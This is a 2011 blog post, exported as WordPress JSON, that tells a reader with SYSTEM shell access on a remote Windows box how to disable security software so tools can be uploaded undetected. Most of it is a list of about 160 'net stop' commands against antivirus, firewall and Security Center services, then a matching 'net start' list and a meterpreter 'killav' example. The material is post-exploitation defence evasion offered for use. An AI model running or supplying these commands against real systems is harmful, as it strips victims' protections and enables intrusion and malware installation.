{"id":318,"date":"2011-12-20T13:06:09","date_gmt":"2011-12-20T12:06:09","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=318"},"modified":"2011-12-20T13:48:49","modified_gmt":"2011-12-20T12:48:50","slug":"quickly-disable-security-apps","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/12\/20\/quickly-disable-security-apps\/","title":{"rendered":"Quickly disable security apps"},"content":{"rendered":"<p>So you&#8217;ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like.<\/p>\n<p>Here&#8217;s a quick list of services to kill:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/>33<br \/>34<br \/>35<br \/>36<br \/>37<br \/>38<br \/>39<br \/>40<br \/>41<br \/>42<br \/>43<br \/>44<br \/>45<br \/>46<br \/>47<br \/>48<br \/>49<br \/>50<br \/>51<br \/>52<br \/>53<br \/>54<br \/>55<br \/>56<br \/>57<br \/>58<br \/>59<br \/>60<br \/>61<br \/>62<br \/>63<br \/>64<br \/>65<br \/>66<br \/>67<br \/>68<br \/>69<br \/>70<br \/>71<br \/>72<br \/>73<br \/>74<br \/>75<br \/>76<br \/>77<br \/>78<br \/>79<br \/>80<br \/>81<br \/>82<br \/>83<br \/>84<br \/>85<br \/>86<br \/>87<br \/>88<br \/>89<br \/>90<br \/>91<br \/>92<br \/>93<br \/>94<br \/>95<br \/>96<br \/>97<br \/>98<br \/>99<br \/>100<br \/>101<br \/>102<br \/>103<br \/>104<br \/>105<br \/>106<br \/>107<br \/>108<br \/>109<br \/>110<br \/>111<br \/>112<br \/>113<br \/>114<br \/>115<br \/>116<br \/>117<br \/>118<br \/>119<br \/>120<br \/>121<br \/>122<br \/>123<br \/>124<br \/>125<br \/>126<br \/>127<br \/>128<br \/>129<br \/>130<br \/>131<br \/>132<br \/>133<br \/>134<br \/>135<br \/>136<br \/>137<br \/>138<br \/>139<br \/>140<br \/>141<br \/>142<br \/>143<br \/>144<br \/>145<br \/>146<br \/>147<br \/>148<br \/>149<br \/>150<br \/>151<br \/>152<br \/>153<br \/>154<br \/>155<br \/>156<br \/>157<br \/>158<br \/>159<br \/>160<br \/>161<br \/><\/div><\/td><td><div class=\"bash codecolorer\">net stop <span class=\"st0\">&quot;Ahnlab Task Scheduler&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;altiris client service&quot;<\/span><br \/>\nnet stop ANTIVIR <br \/>\nnet stop ATRACK <br \/>\nnet stop <span class=\"st0\">&quot;avast! antivirus&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;avast! iavs4 control service&quot;<\/span><br \/>\nnet stop AVCONSOL <br \/>\nnet stop <span class=\"st0\">&quot;AVG6 Service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;AVG7 Alert Manager Server&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;AVG7 Update Service&quot;<\/span><br \/>\nnet stop AVP32 <br \/>\nnet stop <span class=\"st0\">&quot;AVP control center service&quot;<\/span><br \/>\nnet stop AVP.EXE &nbsp;<br \/>\nnet stop <span class=\"st0\">&quot;AVSync Manager&quot;<\/span><br \/>\nnet stop AVSYNMGR <br \/>\nnet stop <span class=\"st0\">&quot;Background Intelligent Transfer Service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;BlackICE&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;carbon copy access edition&quot;<\/span><br \/>\nnet stop CFINET <br \/>\nnet stop CFINET32 <br \/>\nnet stop <span class=\"st0\">&quot;config loader&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;DefWatch&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Detector de OfficeScanNT&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;directupdate engine&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;dllhost&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;dns&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;etrust antivirus job server&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;eTrust Antivirus Job Server&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;etrust antivirus realtime server&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;eTrust Antivirus Realtime Server&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;etrust antivirus rpc server&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;eTrust Antivirus RPC Server&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Eventask&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;FireBall&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;FireBaum&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;fix-it task manager&quot;<\/span><br \/>\nnet stop F-PROT95 <br \/>\nnet stop FP-WIN <br \/>\nnet stop F-STOPW <br \/>\nnet stop <span class=\"st0\">&quot;fxsvc&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;gear security&quot;<\/span><br \/>\nnet stop IAMAPP <br \/>\nnet stop ICMON <br \/>\nnet stop <span class=\"st0\">&quot;intel file transfer&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;intel pds&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Internet Connection Firewall (ICF) \/ Internet Connection Sharing (ICS)&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;InternetFirewallProc&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;internet pr0tocol&quot;<\/span><br \/>\nnet stop IOMON98 <br \/>\nnet stop <span class=\"st0\">&quot;iroff&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;KAV Moniter Service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;kerio personal firewall&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Kingsoft AntiVirus Service&quot;<\/span><br \/>\nnet stop LOCKDOWN2000 <br \/>\nnet stop LUALL <br \/>\nnet stop LUCOMSERVER <br \/>\nnet stop <span class=\"st0\">&quot;MastDLL&quot;<\/span><br \/>\nnet stop MCAFEE <br \/>\nnet stop <span class=\"st0\">&quot;McAfee Agent&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;McAfee.com McShield&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;McAfee.com VirusScan Online Realtime Engine&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;mcafee framework service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;mcshield&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;McShield&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;MonSvcNT&quot;<\/span><br \/>\nnet stop msclol2<br \/>\nnet stop <span class=\"st0\">&quot;msclol2&quot;<\/span><br \/>\nnet stop msclol8<br \/>\nnet stop <span class=\"st0\">&quot;msclol8&quot;<\/span><br \/>\nnet stop msinit<br \/>\nnet stop <span class=\"st0\">&quot;MsInt&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;MsIntScan&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;NAV Alert&quot;<\/span><br \/>\nnet stop NAVAPSVC <br \/>\nnet stop NAVAPW32 <br \/>\nnet stop <span class=\"st0\">&quot;NAV Auto-Protect&quot;<\/span><br \/>\nnet stop NAVLU32 <br \/>\nnet stop NAVRUNR <br \/>\nnet stop NAVW32 <br \/>\nnet stop NAVWNT <br \/>\nnet stop NISSERV <br \/>\nnet stop NISUM <br \/>\nnet stop NMAIN <br \/>\nnet stop noipducservice<br \/>\nnet stop NORTON <br \/>\nnet stop <span class=\"st0\">&quot;Norton AntiVirus Auto Protect Service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Norton AntiVirus Client&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Norton AntiVirus Corporate Edition&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Norton AntiVirus Server&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Norton Internet Security Accounts Manager&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Norton Internet Security Proxy Srvice&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Norton Internet Security service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Norton Unerase Protection&quot;<\/span><br \/>\nnet stop NVC95 <br \/>\nnet stop <span class=\"st0\">&quot;nvscv&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;officescannt listener&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;OfficeScanNT Monitor&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;officescannt realtime scan&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;outpost firewall service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;P2P Networking&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Panda Antivirus&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;pcanywhere host service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;PC-cillin Personal Firewall&quot;<\/span><br \/>\nnet stop PCCIOMON<br \/>\nnet stop PCCMAIN <br \/>\nnet stop PCCWIN98 <br \/>\nnet stop POP3TRAP <br \/>\nnet stop psexesvc<br \/>\nnet stop PVIEW95 <br \/>\nnet stop <span class=\"st0\">&quot;Quick Heal Online Protection&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;RemoteAgent&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;remotely possible\/32&quot;<\/span><br \/>\nnet stop RESCUE32 <br \/>\nnet stop <span class=\"st0\">&quot;rising process communication center&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Rising Process Communication Center&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;rising realtime monitor service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;Rising Realtime Monitor Service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;rundll&quot;<\/span><br \/>\nnet stop SAFEWEB <br \/>\nnet stop <span class=\"st0\">&quot;ScriptBlocking Service&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;scvhost&quot;<\/span><br \/>\nnet stop <span class=\"st0\">&quot;secur2<br \/>\nnet stop &quot;<\/span>Security Center<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>services32 service: msinit<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>servu<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Serv-U<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>serv-u-ftp<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>smss<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>snake sockproxy service<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Sophos Anti-Virus<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Sophos Anti-Virus Network<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Sygate Personal Firewall<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Sygate Personal Firewall Pro<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>SyGateService<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>symantec central quarantine<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Symantec Event Manager<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Symantec Proxy Service<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>symantec quarantine agent<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>symantec quarantine scanner<span class=\"st0\">&quot;<br \/>\nnet stop SYMPROXYSVC <br \/>\nnet stop &quot;<\/span>syslock<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>System Event Notification<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>systemsecuritydll<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>task manager<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Trend Micro Proxy Service<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Trend NT Realtime Service<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>V3MonNT<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>V3MonSvc<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>ViRobot Expert Monitoring<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>ViRobot Lite Monitoring<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>ViRobot Professional Monitoring<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>vnc server<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>VNC server<span class=\"st0\">&quot;<br \/>\nnet stop VSHWIN32 <br \/>\nnet stop VSSTAT <br \/>\nnet stop WEBSCANX <br \/>\nnet stop WEBTRAP <br \/>\nnet stop win32sl<br \/>\nnet stop &quot;<\/span>Windows Firewall<span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>Windows Internet Connection Sharing<span class=\"br0\">&#40;<\/span>ICS<span class=\"br0\">&#41;<\/span><span class=\"st0\">&quot;<br \/>\nnet stop &quot;<\/span>ZoneAlarm<span class=\"st0\">&quot;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Use with caution as it&#8217;s not as easy to start them all up again, maybe this would help?:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/>33<br \/>34<br \/>35<br \/>36<br \/>37<br \/>38<br \/>39<br \/>40<br \/>41<br \/>42<br \/>43<br \/>44<br \/>45<br \/>46<br \/>47<br \/>48<br \/>49<br \/>50<br \/>51<br \/>52<br \/>53<br \/>54<br \/>55<br \/>56<br \/>57<br \/>58<br \/>59<br \/>60<br \/>61<br \/>62<br \/>63<br \/>64<br \/>65<br \/>66<br \/>67<br \/>68<br \/>69<br \/>70<br \/>71<br \/>72<br \/>73<br \/>74<br \/>75<br \/>76<br \/>77<br \/>78<br \/>79<br \/>80<br \/>81<br \/>82<br \/>83<br \/>84<br \/>85<br \/>86<br \/>87<br \/>88<br \/>89<br \/>90<br \/>91<br \/>92<br \/>93<br \/>94<br \/>95<br \/>96<br \/>97<br \/>98<br \/>99<br \/>100<br \/>101<br \/>102<br \/>103<br \/>104<br \/>105<br \/>106<br \/>107<br \/>108<br \/>109<br \/>110<br \/>111<br \/>112<br \/>113<br \/>114<br \/>115<br \/>116<br \/>117<br \/>118<br \/>119<br \/>120<br \/>121<br \/>122<br \/>123<br \/>124<br \/>125<br \/>126<br \/>127<br \/>128<br \/>129<br \/>130<br \/>131<br \/>132<br \/>133<br \/>134<br \/>135<br \/>136<br \/>137<br \/>138<br \/>139<br \/>140<br \/>141<br \/>142<br \/>143<br \/>144<br \/>145<br \/>146<br \/>147<br \/>148<br \/>149<br \/>150<br \/>151<br \/>152<br \/>153<br \/>154<br \/>155<br \/>156<br \/>157<br \/>158<br \/>159<br \/>160<br \/>161<br \/><\/div><\/td><td><div class=\"bash codecolorer\">net start <span class=\"st0\">&quot;Ahnlab Task Scheduler&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;altiris client service&quot;<\/span><br \/>\nnet start ANTIVIR <br \/>\nnet start ATRACK <br \/>\nnet start <span class=\"st0\">&quot;avast! antivirus&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;avast! iavs4 control service&quot;<\/span><br \/>\nnet start AVCONSOL <br \/>\nnet start <span class=\"st0\">&quot;AVG6 Service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;AVG7 Alert Manager Server&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;AVG7 Update Service&quot;<\/span><br \/>\nnet start AVP32 <br \/>\nnet start <span class=\"st0\">&quot;AVP control center service&quot;<\/span><br \/>\nnet start AVP.EXE &nbsp;<br \/>\nnet start <span class=\"st0\">&quot;AVSync Manager&quot;<\/span><br \/>\nnet start AVSYNMGR <br \/>\nnet start <span class=\"st0\">&quot;Background Intelligent Transfer Service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;BlackICE&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;carbon copy access edition&quot;<\/span><br \/>\nnet start CFINET <br \/>\nnet start CFINET32 <br \/>\nnet start <span class=\"st0\">&quot;config loader&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;DefWatch&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Detector de OfficeScanNT&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;directupdate engine&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;dllhost&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;dns&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;etrust antivirus job server&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;eTrust Antivirus Job Server&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;etrust antivirus realtime server&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;eTrust Antivirus Realtime Server&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;etrust antivirus rpc server&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;eTrust Antivirus RPC Server&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Eventask&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;FireBall&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;FireBaum&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;fix-it task manager&quot;<\/span><br \/>\nnet start F-PROT95 <br \/>\nnet start FP-WIN <br \/>\nnet start F-STOPW <br \/>\nnet start <span class=\"st0\">&quot;fxsvc&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;gear security&quot;<\/span><br \/>\nnet start IAMAPP <br \/>\nnet start ICMON <br \/>\nnet start <span class=\"st0\">&quot;intel file transfer&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;intel pds&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Internet Connection Firewall (ICF) \/ Internet Connection Sharing (ICS)&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;InternetFirewallProc&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;internet pr0tocol&quot;<\/span><br \/>\nnet start IOMON98 <br \/>\nnet start <span class=\"st0\">&quot;iroff&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;KAV Moniter Service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;kerio personal firewall&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Kingsoft AntiVirus Service&quot;<\/span><br \/>\nnet start LOCKDOWN2000 <br \/>\nnet start LUALL <br \/>\nnet start LUCOMSERVER <br \/>\nnet start <span class=\"st0\">&quot;MastDLL&quot;<\/span><br \/>\nnet start MCAFEE <br \/>\nnet start <span class=\"st0\">&quot;McAfee Agent&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;McAfee.com McShield&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;McAfee.com VirusScan Online Realtime Engine&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;mcafee framework service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;mcshield&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;McShield&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;MonSvcNT&quot;<\/span><br \/>\nnet start msclol2<br \/>\nnet start <span class=\"st0\">&quot;msclol2&quot;<\/span><br \/>\nnet start msclol8<br \/>\nnet start <span class=\"st0\">&quot;msclol8&quot;<\/span><br \/>\nnet start msinit<br \/>\nnet start <span class=\"st0\">&quot;MsInt&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;MsIntScan&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;NAV Alert&quot;<\/span><br \/>\nnet start NAVAPSVC <br \/>\nnet start NAVAPW32 <br \/>\nnet start <span class=\"st0\">&quot;NAV Auto-Protect&quot;<\/span><br \/>\nnet start NAVLU32 <br \/>\nnet start NAVRUNR <br \/>\nnet start NAVW32 <br \/>\nnet start NAVWNT <br \/>\nnet start NISSERV <br \/>\nnet start NISUM <br \/>\nnet start NMAIN <br \/>\nnet start noipducservice<br \/>\nnet start NORTON <br \/>\nnet start <span class=\"st0\">&quot;Norton AntiVirus Auto Protect Service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Norton AntiVirus Client&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Norton AntiVirus Corporate Edition&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Norton AntiVirus Server&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Norton Internet Security Accounts Manager&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Norton Internet Security Proxy Srvice&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Norton Internet Security service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Norton Unerase Protection&quot;<\/span><br \/>\nnet start NVC95 <br \/>\nnet start <span class=\"st0\">&quot;nvscv&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;officescannt listener&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;OfficeScanNT Monitor&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;officescannt realtime scan&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;outpost firewall service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;P2P Networking&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Panda Antivirus&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;pcanywhere host service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;PC-cillin Personal Firewall&quot;<\/span><br \/>\nnet start PCCIOMON<br \/>\nnet start PCCMAIN <br \/>\nnet start PCCWIN98 <br \/>\nnet start POP3TRAP <br \/>\nnet start psexesvc<br \/>\nnet start PVIEW95 <br \/>\nnet start <span class=\"st0\">&quot;Quick Heal Online Protection&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;RemoteAgent&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;remotely possible\/32&quot;<\/span><br \/>\nnet start RESCUE32 <br \/>\nnet start <span class=\"st0\">&quot;rising process communication center&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Rising Process Communication Center&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;rising realtime monitor service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;Rising Realtime Monitor Service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;rundll&quot;<\/span><br \/>\nnet start SAFEWEB <br \/>\nnet start <span class=\"st0\">&quot;ScriptBlocking Service&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;scvhost&quot;<\/span><br \/>\nnet start <span class=\"st0\">&quot;secur2<br \/>\nnet start &quot;<\/span>Security Center<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>services32 service: msinit<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>servu<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Serv-U<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>serv-u-ftp<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>smss<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>snake sockproxy service<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Sophos Anti-Virus<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Sophos Anti-Virus Network<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Sygate Personal Firewall<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Sygate Personal Firewall Pro<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>SyGateService<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>symantec central quarantine<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Symantec Event Manager<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Symantec Proxy Service<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>symantec quarantine agent<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>symantec quarantine scanner<span class=\"st0\">&quot;<br \/>\nnet start SYMPROXYSVC <br \/>\nnet start &quot;<\/span>syslock<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>System Event Notification<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>systemsecuritydll<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>task manager<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Trend Micro Proxy Service<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Trend NT Realtime Service<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>V3MonNT<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>V3MonSvc<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>ViRobot Expert Monitoring<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>ViRobot Lite Monitoring<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>ViRobot Professional Monitoring<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>vnc server<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>VNC server<span class=\"st0\">&quot;<br \/>\nnet start VSHWIN32 <br \/>\nnet start VSSTAT <br \/>\nnet start WEBSCANX <br \/>\nnet start WEBTRAP <br \/>\nnet start win32sl<br \/>\nnet start &quot;<\/span>Windows Firewall<span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>Windows Internet Connection Sharing<span class=\"br0\">&#40;<\/span>ICS<span class=\"br0\">&#41;<\/span><span class=\"st0\">&quot;<br \/>\nnet start &quot;<\/span>ZoneAlarm<span class=\"st0\">&quot;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Or the easy way should you have a materpreter session on the remote box:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"bash codecolorer\">meterpreter <span class=\"sy0\">&gt;<\/span> run killav<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Killing Antivirus services on the target...<br \/>\nmeterpreter <span class=\"sy0\">&gt;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"<p>So you&#8217;ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like. Here&#8217;s a quick list of services to kill: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161net stop &quot;Ahnlab Task Scheduler&quot; net stop &quot;altiris client service&quot; net stop ANTIVIR net stop ATRACK net stop &quot;avast! [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[124,126,125,123,122,127],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/318"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=318"}],"version-history":[{"count":2,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/318\/revisions"}],"predecessor-version":[{"id":320,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/318\/revisions\/320"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}